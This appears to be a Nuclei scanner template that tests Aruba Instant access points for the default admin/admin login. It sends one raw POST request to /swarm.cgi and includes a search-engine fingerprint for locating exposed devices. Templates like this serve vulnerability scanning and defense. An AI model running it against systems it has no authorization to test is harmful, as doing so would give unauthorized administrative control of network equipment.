id: aruba-instant-default-login

info:
  name: Aruba Instant - Default Login
  author: SleepingBag945
  severity: high
  description: |
    Aruba Instant is an AP device. The device has a default password, and attackers can control the entire platform through the default password admin/admin vulnerability, and use administrator privileges to operate core functions.
  reference:
    - https://www.192-168-1-1-ip.co/aruba-networks/routers/179/#:~:text=The%20default%20username%20for%20your,control%20panel%20of%20your%20router.
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="jscripts/third_party/raphael-treemap.min.js" || body="jscripts/third_party/highcharts.src.js"
  tags: aruba,default-login

http:
  - raw:
      - |
        POST /swarm.cgi  HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        opcode=login&user={{username}}&passwd={{password}}&refresh=false&nocache=0.17699820340903838

    attack: pitchfork
    payloads:
      username:
        - admin
      password:
        - admin
    host-redirects: true
    cookie-reuse: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200'
          - 'contains(body_1,"name=\"sid") && contains(body_1,"true\">Admin")'
        condition: and

# digest: 4b0a004830460221008db0d66a3387df059f84c9af5adf592d9f1d1ef472c1f0457384b2d110b06cd7022100d20882cff79925a0b5b81863248f4d47d9c4bcc66266b607664aa4c5bfa7927a:922c64590222798bb761d5b6d8e72950
